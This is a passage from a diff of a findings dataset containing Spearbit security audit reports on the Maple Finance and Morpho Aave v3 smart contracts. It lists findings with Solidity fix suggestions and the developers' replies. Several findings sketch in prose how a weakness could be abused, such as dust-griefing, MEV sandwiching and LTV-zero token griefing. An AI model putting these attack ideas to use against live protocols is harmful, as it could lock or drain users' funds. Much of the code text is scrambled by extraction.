system that includes upgradeable initializers for factory created contracts. For the most part, a storage value that was left uninitialized due to an erroneous initializer would not be affect protocol funds. For example forgetting to initialize _locked would cause all nonReentrant functions to revert, but no funds lost. However, if the poolDelegateCover address were unset and depositCover() were called, the funds would be lost as there is no to != address(0) check in transferFrom. Recommendation: Consider adding an explicit check to the migrate() function: 15 function migrate(address migrator_, bytes calldata arguments_) external override { require(msg.sender == _factory(), require(_migrate(migrator_, arguments_), "PM:M:FAILED"); require(poolDelegateCover != address(0), "PM:M:NOT_FACTORY"); "PM:M:DELEGATE_NOT_SET"); + } Alternatively consider adding to != address(0) check to the transferFrom() for more robust protection. Maple: Fixed in #204. Spearbit: Fixed. +5.3.13 Globals.poolDelegates[delegate_].ownedPoolManager mapping can be overwritten Severity: Low Risk Context: globals-v2/MapleGlobals.sol#L112 Description: The Globals.poolDelegates[delegate_].ownedPoolManager keeps track of a single pool manager for a pool delegate. It can happen that the same pool delegate is registered for a second pool manager and the mapping is overwritten, by calling PM.acceptPendingPoolDelegate -> Globals.transferOwnedPoolManager or Globals.activatePoolManager. Recommendation: Consider checking that the pool delegate does not own a pool manager yet. function activatePoolManager(address poolManager_) external override isGovernor { address delegate_ = IPoolManagerLike(poolManager_).poolDelegate(); require(poolDelegates[delegate_].ownedPoolManager == 0, "MG:APM:ALREADY_OWNS"); emit PoolManagerActivated(poolManager_, delegate_); poolDelegates[delegate_].ownedPoolManager = poolManager_; + } function transferOwnedPoolManager(address fromPoolDelegate_, address toPoolDelegate_) external override { PoolDelegate storage fromDelegate_ = poolDelegates[fromPoolDelegate_]; PoolDelegate storage toDelegate_ require(fromDelegate_.ownedPoolManager == msg.sender, "MG:TOPM:NOT_AUTHORIZED"); require(toDelegate_.isPoolDelegate, require(toDelegate_.ownedPoolManager == 0, fromDelegate_.ownedPoolManager = address(0); toDelegate_.ownedPoolManager = msg.sender; emit PoolManagerOwnershipTransferred(fromPoolDelegate_, toPoolDelegate_, msg.sender); "MG:TOPM:NOT_POOL_DELEGATE"); "MG:TOPM:ALREADY_OWNS"); = poolDelegates[toPoolDelegate_]; ,! + } Maple: Fixed in #38. Spearbit: Fixed. 16 +5.3.14 Pool withdrawals can be kept low by non-redeeming users Severity: Low Risk Context: withdrawal-manager::WithdrawalManager.sol#L331 Description: In the current pool design, users request to exit the pool and are scheduled for a withdrawal window in the withdrawal manager. If the pool does not have enough liquidity, their share on the available pool liquidity is proportionate to the total shares of all users who requested to withdraw in that withdrawal window. It's possible for griefers to keep the withdrawals artificially low by requesting a withdrawal but not actually withdraw- ing during the withdrawal window. These griefers are not penalized but their behavior leads to worse withdrawal amounts for every other honest user. Recommendation: There's no straightforward solution in the current design of the withdrawal process. Short- term, monitor the withdrawal situation for this issue. Long-term, consider enforcing withdrawals during the with- drawal window or penalizing withdrawers that requested a withdrawal but did not withdraw. Maple: Yes we are aware of this and discussed it during our design phase. We will continuously evaluate this over time and determine if a WM upgrade is necessary with an alternative design. Spearbit: Acknowledged. +5.3.15 _getCollateralRequiredFor should round up Severity: Low Risk Context: loan::MapleLoan.sol#L700 Description: The _getCollateralRequiredFor rounds down the collateral that is required from the borrower. This benefits the borrower. Recommendation: Consider rounding up. - (collateralRequired_ * (principal_ - drawableFunds_)) / principalRequested_ + (collateralRequired_ * (principal_ - drawableFunds_) + principalRequested_ - 1) / principalRequested_ Maple: Fixed in #243. Spearbit: Fixed. 5.4 Gas Optimization +5.4.1 Use the cached variable in makePayment Severity: Gas Optimization Context: loan (v4.0.0-rc.1):: MapleLoan.sol#L185 Description: The claim function is called using _nextPaymentDueDate instead of nextPaymentDueDate_ Recommendation: Should use cached nextPaymentDueDate_ variable to save gas. - ILenderLike(_lender).claim(principal_, interest_, previousPaymentDueDate_, _nextPaymentDueDate); + ILenderLike(_lender).claim(principal_, interest_, previousPaymentDueDate_, nextPaymentDueDate_); Maple: Fixed in #237. Spearbit: Fixed. 17 +5.4.2 No need to explicitly initialize variables with default values Severity: Gas Optimization Context: pool-v2 (v1.0.0-rc.1)::LoanManager.sol#L367 pool-v2 (v1.0.0-rc.1)::PoolManager.sol#L196 Description: By default a value of a variable is set to 0 for uint, false for bool, address(0) for address. . . Explicitly initializing/setting it with its default value wastes gas. Recommendation: In LoanManager.sol is recommended to remove line 367: - liquidationComplete_ = false; In PoolManager.sol - uint256 i_ = 0; + uint256 i_; Maple: Fixed in #193. Spearbit: Fixed. +5.4.3 Cache calculation in getExpectedAmount Severity: Gas Optimization Context: pool-v2 (v1.0.0-rc.1)::LoanManager.sol#L850 pool-v2 (v1.0.0-rc.1)::LoanManager.sol#L853 Description: The decimal precision calculation is used twice in the getExpectedAmount function, if you cache into a new variable would save some gas. Recommendation: Follow the code to fix this issue: - uint8 collateralAssetDecimals_ = IERC20Like(collateralAsset_).decimals(); + uint256 collateralAssetDecimals_ = uint256(10) ** uint256(IERC20Like(collateralAsset_).decimals()); uint256 oracleAmount = swapAmount_ * IMapleGlobalsLike(globals_).getLatestPrice(collateralAsset_) * uint256(10) ** uint256(IERC20Like(fundsAsset).decimals()) // Convert from `fromAsset` value. // Convert to `toAsset` decimal precision. ,! * (HUNDRED_PERCENT - allowedSlippageFor[collateralAsset_]) basis points ,! / IMapleGlobalsLike(globals_).getLatestPrice(fundsAsset) / uint256(10) ** uint256(collateralAssetDecimals_) precision. / collateralAssetDecimals_ precision. / HUNDRED_PERCENT; - ,! + ,! // Multiply by allowed slippage // Convert to `toAsset` value. // Convert from `fromAsset` decimal // Convert from `fromAsset` decimal // Divide basis points for slippage. - uint256 minRatioAmount = (swapAmount_ * minRatioFor[collateralAsset_]) / (uint256(10) ** collateralAssetDecimals_); ,! + uint256 minRatioAmount = (swapAmount_ * minRatioFor[collateralAsset_]) / collateralAssetDecimals_; Maple: Fixed in #194. Spearbit: Fixed. 18 +5.4.4 For-Loop Optmization Severity: Gas Optimization Context: pool-v2::TransitionLoanManager.sol#L103 pool-v2::TransitionLoanManager.sol#L111 pool-v2 (v1.0.0-rc.1)::PoolManager.sol#L542 pool-v2 (v1.0.0-rc.1)::PoolManager.sol#L595 Description: The for-loop can be optimized in 4 ways: 1. Removing initialization of loop counter if the value is 0 by default. 2. Caching array length outside the loop. 3. Prefix increment (++i) instead of postfix increment (i++). 4. Unchecked increment. - for (uint256 i_ = 0; i_ < loans_.length; i_++) { + uint256 length = loans_.length; + for (uint256 i_; i_ < length; ) { ... + unchecked { ++i; } } Recommendation: Optimize the for-loops. Maple: Fixed in #195. Spearbit: There is one more optimization in PR: - for (uint256 i_ = 0; i_ < length_;) { + for (uint256 i_; i_ < length_;) { Maple: Updated in #221. Spearbit: Fixed +5.4.5 Pool._divRoundUp can be more efficient Severity: Gas Optimization Context: pool-v2::Pool.sol#L195 Description: The gas cost of Pool._divRoundUp can be reduced in the context that it's used in. Recommendation: Consider changing to: function _divRoundUp(uint256 numerator_, uint256 divisor_) internal pure returns (uint256 result_) { - + } result_ = (numerator_ / divisor_) + (numerator_ % divisor_ > 0 ? 1 : 0); result_ = (numerator_ + divisor_ - 1) / divisor_; Maple: Fixed in #201. Spearbit: Fixed. 19 +5.4.6 Liquidator uses different reentrancy guards than rest of codebase Severity: Gas Optimization Context: liquidations::Liquidator.sol#L28 Description: All other reentrancy guards of the codebase use values 1/2 instead of 0/1 to indicate NOT_- LOCKED/LOCKED. Recommendation: Consider using 1/2 values as well for gas efficiency reasons and to unify the codebase. It's important to update the LiquidatorInitializer._initialize function and set it to the non-zero NOT_LOCKED value then. Maple: Fixed in #52. Spearbit: Fixed. +5.4.7 Use block.timestamp instead of domainStart in removeLoanImpairment Severity: Gas Optimization Context: pool-v2::LoanManager.sol#L291 Description: The removeLoanImpairment function adds back all interest from the payment's start date to domain- Start. The _advanceGlobalPaymentAccounting sets domainStart to block.timestamp. Recommendation: Consider accruing the interest from paymentInfo_.startDate to block.timestamp directly to make the code easier to understand and a gas improvement. // Discretely update missing interest as if payment was always part of the list. _updateIssuanceParams( issuanceRate + paymentInfo_.issuanceRate, - accountedInterest + _uint112(_getPaymentAccruedInterest(paymentInfo_.startDate, domainStart, paymentInfo_.issuanceRate, paymentInfo_.refinanceInterest)) ,! + accountedInterest + _uint112(_getPaymentAccruedInterest(paymentInfo_.startDate, block.timestamp, paymentInfo_.issuanceRate, paymentInfo_.refinanceInterest)) ,! ); Maple: Fixed in #206. Spearbit: Fixed. +5.4.8 setTimelockWindows checks isGovernor multiple times Severity: Gas Optimization Context: globals-v2/MapleGlobals.sol#L241-L246 Description: The Globals.setTimelockWindows function calls setTimelockWindow in a loop and each time set- TimelockWindow's isGovernor is checked. Recommendation: Only check isGovernor once to optimize the function. Consider creating and calling an internal _setTimeLockWindow function that does not call this modifier. Maple: Fixed in #39. Spearbit: Fixed, just a potential cleanup: setTimelockWindow could also call the internal _setTimelockWindow 20 +5.4.9 fullDaysLate computation can be optimized Severity: Gas Optimization Context: loan::MapleLoan.sol#L843 Description: The fullDaysLate computation can be optimized. Recommendation: Consider changing to: - (((currentTime_ - nextPaymentDueDate_ - 1) / 1 days) + 1) * 1 days + ((currentTime_ - nextPaymentDueDate_ + (1 days - 1)) / 1 days) * 1 days Maple: Fix PR added #248. Spearbit: Fixed. 5.5 Informational +5.5.1 Users can prevent repossessed funds from being claimed Severity: Informational Context: debt-locker::DebtLocker.sol#L325-L329 Description: The DebtLocker.sol contract dictates an active liquidation by the following two conditions: • The _liquidator state variable is a non-zero address. • The current balance of the _liquidator contract is non-zero. If an arbitrary user sends 1 wei of funds to the liquidator's address, the borrower will be unable to claim repos- sessed funds as seen in the _handleClaimOfRepossessed() function. While the scope of the audit only covered the diff between v3.0.0 and v4.0.0-rc.0, the audit team decided it was important to include this as an informational issue. The Maple team will be addressing this in their V2 release. Recommendation: Consider using collateralRemaining as an indicator for when a liquidation has finished. Maple: Acknowledged, won't address because DebtLockers are getting deprecated upon launch and migration. Spearbit: Acknowledged. +5.5.2 MEV whenever totalAssets jumps Severity: Informational Context: pool-v2::Pool.sol#L278, pool-v2::Pool.sol#L275 Description: An attack users can try to capture large interest payments is sandwiching a payment with a deposit and a withdrawal. The current codebase tries to mostly eliminate this attack by: • Optimistically assuming the next interest payment will be paid back and accruing the interest payment linearly over the payment interval. • Adding a withdrawal period. However, there are still circumstances where the totalAssets increase by a large amount at once: • Users paying back their payment early. The jump in totalAssets will be the paymentAmount - timeE- lapsedSincePaymentStart / paymentInterval * paymentAmount. • Users paying back their entire loan early (closeLoan). • Late payments increase it by the late interest fees and the accrued interest for the next payment from its start date to now. 21 Recommendation: These opportunities are rather rare and hard to completely mitigate because they are under the borrower's control. In a future version of the protocol, consider streaming single large interest payments to the pool over a certain time. Maple: We are aware that it is possible, but with our accounting mechanism for the LoanManager, the Withdrawal- Manager, and sufficient diversification in the loan portfolio, this issue will be very minor in terms of percent value change. We acknowledge and will not address. Spearbit: Acknowledged. +5.5.3 Use ERCHelper approve() as best practice Severity: Informational Context: loan (v4.0.0-rc.1)::LoanManager.sol#L317 Description: The ERC20 approve function is being used by fundsAsset in fundLoan() to approve the max amount which does not check the return value. Recommendation: Use ERCHelper approve() as a best practice. Maple: Fixed in #236. Spearbit: Fixed. +5.5.4 Additional verification in removeLoanImpairment Severity: Informational Context: pool-v2::LoanManager.sol#L266 Description: Currently, if removeLoanImpairment is called after the loan's original due date, there will be no issues because the loan's removeLoanImpairment function will revert. It would be good to add a comment about this logic or duplicate the check explicitly in the loan manager. If the loan implementation is upgraded in the future to have a non-reverting removeLoanImpairment function, then the loan manager as-is would account for the interest incorrectly. Recommendation: Consider adding a comment to the loan manager such as: + // NOTE: This call will revert if we are past the original due date IMapleLoanLike(loan_).removeLoanImpairment(); Also, consider duplicating the check explicitly in the loan manager. Maple: Fixed in #192. Spearbit: Fixed. +5.5.5 Can check msg.sender != collateralAsset/fundsAsset for extra safety Severity: Informational Context: liquidations(v2.0.0-rc.1)::Liquidator.sol#L93 Description: Some old ERC tokens (e.g. the Sandbox's SAND token) allow arbitrary calls from the token address itself. This odd behavior is usually a result of implementing the ERC677 approveAndCall and transferAndCall functions incorrectly. With these tokens, it is technically possible for the low-level msg.sender.call(...) in the liquidator to be executing arbitrary code on one of the tokens, which could let an attacker drain the funds. Recommendation: Although it is very unlikely for Maple to whitelist one of these tokens as the collateral/asset, consider adding an explicit check to the liquidatePortion function: + require(msg.sender != collateralAsset && msg.sender != fundsAsset); 22 It is also recommended keeping this in mind when whitelisting future tokens. Maple: Fixed in #51. Spearbit: Fixed. +5.5.6 IERC426 Implementation of preview and max functions Severity: Informational Context: IERC4626.previewWithdrawal() IERC4626.previewDeposit() IERC4626.previewMint() IERC4626.previewRedeem() Description: For the preview functions, EIP 4626 states: MAY revert due to other conditions that would also cause the deposit [mint/redeem, etc.] to revert. But the comments in the interface currently state: MUST NOT revert. In addition to the comments, there is the actual behavior of the preview functions. A commonly accepted interpreta- tion of the standard is that these preview functions should revert in the case of conditions such as protocolPaused, !active, !openToPublic totalAssets > liquidityCap etc. The argument basically states that the max functions should return 0 under such conditions and the preview functions should revert whenever the amount exceeds the max. Recommendation: At a minimum, consider clarifying the NatSpec. Also, carefully consider the behavior of the preview functions. As an early adopter of 4626, decisions by Maple now could have ripple effects on the industry. Maple: Fixed in #51. Spearbit: The team decided to return 0 for preview* functions instead of reverting. There's a bug in the PR #51#discussion_r1020201462 ‘previewWithdraw‘ also always returns 0 but it should be possible to call ‘withdraw‘ in a way to return non-zero assets. See Pool.previewWithdraw always reverts but Pool.withdraw can succeed for a related issue to unify the behavior of these two functions. Did you decide not to account for protocolPaused and _canDeposit() in the preview / max functions? Maple: We merged a fix that you mentioned with this PR #53. We decided not to have any reverts for the preview functions as we believe that would be better for integrators. Also, the spec states "May revert" in those conditions such as a protocol pause so we believe we are still in spec if we are choosing not to revert. Spearbit: That should be ok. There is so much ambiguity in the standard I think it's fine to make this judgment call which reduces complexity in the code of integrators. One small nit, you may want to consider updating the NatSpec on the preview functions in the interface as men- tioned in #68#issue-1435405355. It says "MUST NOT REVERT" but the standard says "MAY REVERT" so I could see some confusion around that. You could either change that to "MAY REVERT" or write something like "Maple has decided that these will not revert" or even just delete the line that says "MUST NOT REVERT" on the preview() functions would eliminate any future confusion. Maple: Acknowledged we'll make the update and come back to you folks. Fixed in #226. Spearbit: Fixed. 23 +5.5.7 Set domainEnd correctly in intermediate _advanceGlobalPaymentAccounting steps Severity: Informational Context: pool-v2::LoanManager.sol#L675 In the _advanceGlobalPaymentAccounting Description: pay- ments[paymentWithEarliestDueDate].paymentDueDate, which is possibly zero if the last payment has just been accrued past. This is currently not an issue, because in this scenario domainEnd would never be used before it is set back to its correct value in _updateIssuanceParams. However, for increased readability, it is recommended to prevent this odd intermediate state from ever occurring. domainEnd function, set to is Recommendation: In _advanceGlobalPaymentAccounting, copy the same logic that _updateIssuanceParams has for setting domainEnd: = payments[paymentWithEarliestDueDate].paymentDueDate; - domainEnd_ + domainEnd_ = paymentWithEarliestDueDate == 0 + + ? _uint48(block.timestamp) : payments[paymentWithEarliestDueDate].paymentDueDate; Maple: Fixed in #190. Spearbit: Fixed. +5.5.8 Replace hard-coded value with PRECISION constant Severity: Informational Context: pool-v2::LoanManager.sol#L468 Description: The constant PRECISION is equal to 1e30. The hard-coded value 1e30 is used in the _queueNext- Payment function, which can be replaced by PRECISION. Recommendation: Change 1e30 to PRECISION: - uint256 incomingNetInterest_ = newRate_ * (nextPaymentDueDate_ - startDate_) / 1e30; // NOTE: Use issuanceRate to capture rounding errors. ,! + uint256 incomingNetInterest_ = newRate_ * (nextPaymentDueDate_ - startDate_) / PRECISION; // NOTE: ,! Use issuanceRate to capture rounding errors. Maple: Fixed in #191. Spearbit: Fixed. +5.5.9 Use of floating pragma version Severity: Informational Context: rc.0)::Interfaces.sol#L2 globals-v2 (v1.0.0-rc.0)::IMapleGlobals.sol#L2 globals-v2 (v1.0.0- Description: Contracts should be deployed using a fixed pragma version. Locking the pragma helps to ensure that contracts do not accidentally get deployed using, for example, an outdated compiler version that might introduce bugs that affect the contract system negatively. Recommendation: Lock the pragma version and also consider upgrading the project pragma version to a newer stable version, currently 0.8.7. Maple: PR for the fix #37. Spearbit: Fixed. 24 +5.5.10 PoolManager has low-level shares computation logic Severity: Informational Context: pool-v2::PoolManager.sol#L570, pool-v2::PoolManager.sol#L578 Description: The PoolManager has low-level shares computation logic that should ideally only be in the ERC4626 Pool to separate the concerns. Recommendation: Consider refactoring the PoolManager to call functions on the Pool instead: maxMint function maxMint(address receiver_) external view virtual override returns (uint256 maxShares_) { uint256 totalAssets_ = totalAssets(); uint256 totalSupply_ = IPoolLike(pool).totalSupply(); uint256 maxAssets_ = _getMaxAssets(receiver_, totalAssets_); maxShares_ = totalSupply_ == 0 ? maxAssets_ : maxAssets_ * totalSupply_ / totalAssets_; maxShares_ = pool.previewDeposit(maxAssets_) - + } maxWithdraw function maxWithdraw(address owner_) external view virtual override returns (uint256 maxAssets_) { uint256 lockedShares_ = IWithdrawalManagerLike(withdrawalManager).lockedShares(owner_); uint256 maxShares_ = IWithdrawalManagerLike(withdrawalManager).isInExitWindow(owner_) ? ,! lockedShares_ : 0; - maxAssets_ = maxShares_ * (totalAssets() - unrealizedLosses()) / IPoolLike(pool).totalSupply(); ,! + maxAssets_ = pool.convertToExitAssets(maxShares); } // in Pool, add this function + function convertToExitAssets(uint256 shares_) public view override returns (uint256 assets_) { + + } assets_ = shares_ * (totalAssets() - unrealizedLosses()) / totalSupply; Maple: Fixed in #208. Spearbit: Fixed. +5.5.11 Add additional checks to prevent refinancing/funding a closed loan Severity: Informational Context: pool-v2::PoolManager.sol#L432 Description: It's important that an already liquidated loan is not reused by refinancing or funding again as it would break a second liquidation when the second liquidator contract is deployed with the same arguments and salt. Recommendation: Consider explicitly checking for this scenario in the PoolManager._validateAndFundLoan function. After closeLoan, making the last payment with makePayment, or a liquidation's repossess call, _clear- LoanAccounting is called. For example, check that the loan's _paymentsRemaining is not zero. Maple: Fixed in #203. Spearbit: Fixed. 25 +5.5.12 PoolManager.removeLoanManager errors with out-of-bounds if loan manager not found Severity: Informational Context: pool-v2::PoolManager.sol#L188 Description: The PoolManager.removeLoanManager errors with an out-of-bounds error if the loan manager is not found. Recommendation: Consider reverting with a more expressive error. function removeLoanManager(address loanManager_) external override { _whenProtocolNotPaused(); require(msg.sender == poolDelegate, "PM:RLM:NOT_PD"); + require(isLoanManager[loanManager_], "PM:RLM:INVALID_LM"); ... } Maple: Fixed in #196. Spearbit: Fixed. +5.5.13 PoolManager.removeLoanManager does not clear loanManagers mapping Severity: Informational Context: pool-v2::PoolManager.sol#L188 Description: The PoolManager.removeLoanManager does not clear the reverse loanManagers[mapleLoan] = loanManager mapping. Recommendation: In the current version there's no efficient way to enumerate all mapleLoans that have the removed loanManager set. As this function is just a contingency function, consider simply providing the loans to be cleared as an additional argument. Maple: Acknowledged, will need team discussion on whether we implement. Fixed in #212 Spearbit: The loanManagers field has been removed from the PM. The loan -> loanManager mapping is now done by calling loan.lender() on verified loans. Note that when the loan manager is removed by removeLoan- Manager , loans will still return the removed loan manager through loan.lender(). I'll assume that this is indeed the desired behavior for now and set this to fixed. +5.5.14 Pool._requestRedeem reduces the wrong approval amount Severity: Informational Context: pool-v2::Pool.sol#L213 Description: The requestRedeem function transfers escrowShares_ from owner but reduces the approval by shares_. Note that in the current code these values are the same but for future PoolManager upgrades this could change. Recommendation: Reduce the approval by escrowShares_. Maple: Fixed in #202. Spearbit: Fixed. 26 +5.5.15 Issuance rate for double-late claims does not need to be updated Severity: Informational Context: pool-v2::LoanManager.sol#L223 Description: The previousRate_ for the 8c) case in claim is always zero because the payment (!onTimePayment_). The subtraction can be removed is late I'd suggest removing the subtraction here as it's confusing. The first payment's IR was reduced in _advanceGlob- alPaymentAccounting, the newly scheduled one that is also past due date never increased the IR. Recommendation: The first payment's IR was reduced in _advanceGlobalPaymentAccounting, the newly sched- uled payment that is also past the due date never increased the IR. For readability, consider changing the code to: // 8c. If the current timestamp is greater than the RESULTING `nextPaymentDueDate`, then the next ,! // // ,! // payment must be FULLY accounted for, and the new payment must be removed from the sorted list. Payment `issuanceRate` is used for this calculation as the issuance has occurred in isolation and entirely in the past. All interest from the aggregate issuance rate has already been accounted for in `_advanceGlobalPaymentAccounting`. ,! else { ( uint256 accountedInterestIncrease_, ) = _accountToEndOfPayment(paymentIdOf[msg.sender], newRate_, ,! previousPaymentDueDate_, nextPaymentDueDate_); return _updateIssuanceParams( issuanceRate - previousRate_, issuanceRate, accountedInterest + _uint112(accountedInterestIncrease_) - + } ); Maple: Fixed in #199. Spearbit: Fixed. +5.5.16 Additional verification that paymentIdOf[loan_] is not 0 Severity: Informational Context: pool-v2::LoanManager.sol Description: Most functions in the loan manager use the value paymentIdOf[loan_] without first checking if it's the default value of 0. Anyone can pay off a loan at any time to cause the claim function to set paymentIdOf[loan_] to 0, so even the privileged functions could be front-run to call on a loan with paymentIdOf 0. This is not an issue in the current codebase because each function would revert for some other reasons, but it is recommended to add an explicit check so future upgrades on other modules don't make this into a more serious issue. Recommendation: Each time paymentIdOf[loan_] is used in a function, ensure that the value is non-zero before proceeding. Maple: Fixed in #207. Spearbit: Looks good to me, a question about this error string, not sure why it's IL (impairLoan?) when it's called in _handleXYZ. Fixed. 27 +5.5.17 LoanManager redundant check on late payment Severity: Informational Context: pool-v2::LoanManager.sol#L208 The claim function has a check for block.timestamp > previousPaymentDueDate_ && Description: block.timestamp <= nextPaymentDueDate_ in one of the if statements. The payment is already known to be late at this point in the code, so block.timestamp > previousPaymentDueDate_ is always true. Recommendation: Consider removing the check in the code for increased readability and a small gas saving. - if (block.timestamp > previousPaymentDueDate_ && block.timestamp <= nextPaymentDueDate_) { + if (block.timestamp <= nextPaymentDueDate_) { Maple: Fixed in #198. Spearbit: Fixed. +5.5.18 Add encodeArguments/decodeArguments to WithdrawalManagerInitializer Severity: Informational Context: rc.1)::PoolDeployer.sol#L68 withdrawal-manager::WithdrawalManagerInitializer.sol pool-v2 (v1.0.0- Description: Unlike the other Initializers, the WithdrawalManagerInitializer.sol does not have public en- codeArguments/decodeArguments functions, and PoolDeployer need to be changed to use these functions cor- rectly Recommendation: Consider adding these functions and using them in PoolDeployer. //PoolDeployer.sol function deployPool(...) external override returns (...) { ... // Deploy Withdrawal Manager - arguments + arguments = abi.encode(pool_, configParams_[3], configParams_[4]); = IWithdrawalManagerInitializerLike(initializers_[2]).encodeArguments(pool_, ,! configParams_[3], configParams_[4]); withdrawalManager_ = IMapleProxyFactory(factories_[2]).createInstance(arguments, salt_); ... } Maple: Fixed in #205 and #49. Spearbit: Fixed. +5.5.19 Reorder WM.processExit parameters Severity: Informational Context: withdrawal-manager::WithdrawalManager.sol#L210 Description: All other WM and Pool function signatures start with (uint256 shares/assets, address owner) parameters but the WM.processExit has its parameters reversed (address, uint256). Recommendation: Consider reordering the parameters for consistency and rename the account_ parameter to owner_. Maple: Fixed in #48. Spearbit: Only have visibility into the PR for the WM, but it should require changes in the pool module. Do you have the PR for the pool module? 28 Maple: The accompanying PR on pools-v2 #217. Spearbit: Fixed. +5.5.20 Additional verification in MapleLoanInitializer Severity: Informational Context: loan::MapleLoanInitializer.sol#L87 Description: The MapleLoanInitializer could verify additional arguments to avoid bad pool deployments. Recommendation: Consider verifying: require(IMapleGlobalsLike(globals_).isPoolAsset(assets_[1]), ""); require(_paymentInterval > 0, ""); require(_paymentsRemaining > 0, ""); Maple: Fixed in #244. Spearbit: Fixed. +5.5.21 Clean up updatePlatformServiceFee Severity: Informational Context: loan::MapleLoanFeeManager.sol#L109-L110 Description: The updatePlatformServiceFee can be cleaned up to use an existing helper function Recommendation: Consider changing the code to: function updatePlatformServiceFee(uint256 principalRequested_, uint256 paymentInterval_) external override { uint256 platformServiceFeeRate_ = IMapleGlobalsLike(globals).platformServiceFeeRate(_getPoolManager(msg.sender)); uint256 platformServiceFee_ / 365 days / HUNDRED_PERCENT; uint256 platformServiceFee_ = getPlatformServiceFeeForPeriod(msg.sender, principalRequested_, paymentInterval_); = principalRequested_ * platformServiceFeeRate_ * paymentInterval_ platformServiceFee[msg.sender] = platformServiceFee_; emit PlatformServiceFeeUpdated(msg.sender, platformServiceFee_); ,! - ,! - ,! + ,! } Maple: Fixed in #242. Spearbit: Fixed. 29 +5.5.22 Document restrictions on Refinancer Severity: Informational Context: loan::MapleLoan.sol#L290, loan::Refinancer.sol Description: The refinancer may not set unexpected storage slots, like changing the _fundsAsset because _- drawableFunds, _refinanceInterest are still measured in the old fund's asset. Recommendation: The provided Refinancer does indeed not allow this but in theory, any refinancer can be used. It's good to document restrictions on Refinancers or even enforce them in code by doing pre/post checks. Maple: Addressed in Refinancing. Spearbit: Docs mention it so consider this fixed: Note that the Refinancer contract should never set the collateralAsset or fundsAsset and should never directly set drawableFunds, principal or collateral. It still talks about DebtLocker which seems outdated. This call is permissioned in the DebtLocker to only be called by the PoolDelegate. +5.5.23 Typos / Incorrect documentation Severity: Informational Context: See below. Description: The code and comments contain typos or are sometimes incorrect. Recommendation: Consider fixing the typos: • loan::MapleLoan.sol#L93: "to be transfer" => "to be transferred" • withdrawal-manager::WithdrawalManager.sol#L222: The comment is incorrect, it only transfer the re- deemable shares. "Transfer both returned shares and redeemable shares, burn only the redeemable shares in the pool." => "Transfer redeemable shares, burn the redeemable shares in the pool, relock remaining shares." Maple: Fixed in #241 and #47. Spearbit: Fixed. 30 diff --git a/findings_newupdate/spearbit/Morpho-Av3-Spearbit-Security-Review.txt b/findings_newupdate/spearbit/Morpho-Av3-Spearbit-Security-Review.txt new file mode 100644 index 0000000..90d6433 --- /dev/null +++ b/findings_newupdate/spearbit/Morpho-Av3-Spearbit-Security-Review.txt @@ -0,0 +1,36 @@ +5.1.1 Side effects of LTV = 0 assets: Morpho's users will not be able to withdraw (collateral and "pure" supply), borrow and liquidate Severity: Critical Risk Context: PositionsManager.sol#L120-L121, PositionsManager.sol#L180, PositionsManager.sol#L213, Positions- Manager.sol#L261 Description: When an AToken has LTV = 0, Aave restricts the usage of some operations. In particular, if the user owns at least one AToken as collateral that has LTV = 0, operations could revert. 1) Withdraw: if the asset withdrawn is collateral, the user is borrowing something, the operation will revert if the withdrawn collateral is an AToken with LTV > 0. 2) Transfer: if the from is using the asset as collateral, is borrowing something and the asset transferred is an AToken with LTV > 0 the operation will revert. 3) Set the reserve of an AToken as not collateral: if the AToken you are trying to set as non-collateral is an AToken with LTV > 0 the operation will revert. Note that all those checks are done on top of the "normal" checks that would usually prevent an operation, de- pending on the operation itself (like, for example, an HF check). While a "normal" Aave user could simply withdraw, transfer or set that asset as non-collateral, Morpho, with the current implementation, cannot do it. Because of the impossibility to remove from the Morpho wallet the "poisoned AToken", part of the Morpho mechanics will break. • Morpho's users could not be able to withdraw both collateral and "pure" supply • Morpho's users could not be able to borrow • Morpho's users could not be able to liquidate • Morpho's users could not be able to claim rewards via claimRewards if one of those rewards is an AToken with LTV > 0 Recommendation: Morpho should avoid listing as markets ATokens with LTV = 0 or ATokens that soon will be LTV = 0. In case Morpho has already created markets for tokens that will be configured with LTV = 0 a well-detailed and tested procedure to reach a state that prevents the listed side effects should be applied as soon as possible. The final goal of Morpho should be to arrive at a point where those markets are • Paused. • Have no supplied/borrow balance owned by the users. • Have only 1 wei of collateral balance owned by Morpho. • Have the reserve set as non-collateral while remaining overall healthy. The last two points are to avoid possible griefing attacks. Morpho: Fixed in PR 569. Spearbit: The fix implements a mechanism that allows Morpho to set an asset as collateral/not collateral on Morpho and Aave. This implementation is needed to handle the edge case where an asset LTV is set to zero by the Aave Governance. Without setting an LTV = 0 asset as non-collateral on Aave, some core mechanics of Morpho's protocol would break. While this PR solve this specific issue, all the side effects described in the issue still remain true. 5 When an asset is set to isCollateral = false on Morpho or has LTV = 0 on Aave, Morpho's user's LTV and HF will be reduced because Morpho is treating that asset not as collateral anymore. The behavior has the following consequences for Morpho's users: • User could not be able to borrow anymore (because of reduced LTV). • User could not be able to withdraw anymore (because of reduced HF). • User could be liquidable (because of reduced HF). • Increase the possibility, in case of liquidation, to liquidate the whole debtor's collateral (because of reduced HF). • While the asset is not threaded as collateral anymore, it can still be sized during the liquidation process. Note that in case LTV = 0, the same user on Aave would have a different situation because on Aave, in this specific scenario, only the LTV is reduced and not the HF. The PR is lacking documentation of this behavior and the differences between Morpho and Aave in this scenario. The PR is also lacking a well-documented procedure that the users should follow both before and after the LTV = 0 edge case to avoid being liquidated or incur in any of those side effects once Morpho's has set the asset as not-collateral or Aave has set the LTV to zero. Because the PR does not solve the user's side effects, Morpho should consider documenting them and provide a well-documented procedure that the users should follow for the issue's scenario. Morpho should also consider implementing some UI/UX mechanism that properly alerts users to take those actions for assets that will soon be set to isCollateral = false on Morpho or LTV = 0 on Aaave. +5.1.2 Morpho is vulnerable to attackers sending LTV = 0 collateral tokens, supply/supplyCollateral, bor- row and liquidate operations could stop working Severity: Critical Risk Context: • Morpho related context: PositionsManager.sol#L120-L121, PositionsManager.sol#L180, PositionsMan- ager.sol#L213, PositionsManager.sol#L261 • Aave related context: ValidationLogic.sol#L605-L608, SupplyLogic.sol#L146-L156, SupplyLogic.sol#L194- L204, SupplyLogic.sol#L280-L290 Description: When an AToken has LTV = 0, Aave restricts the usage of some operations. In particular, if the user owns at least one AToken as collateral that has LTV = 0, these operations could revert 1) Withdraw: if the asset withdrawn is collateral, the user is borrowing something, the operation will revert if the withdrawn collateral is an AToken with LTV > 0 2) Transfer: if the from is using the asset as collateral, is borrowing something and the asset transferred is an AToken with LTV > 0 the operation will revert 3) Set the reserve of an AToken as not collateral: if the AToken you are trying to set as non-collateral is an AToken with LTV > 0 the operation will revert Note that all those checks are done on top of the "normal" checks that would usually prevent an operation, de- pending on the 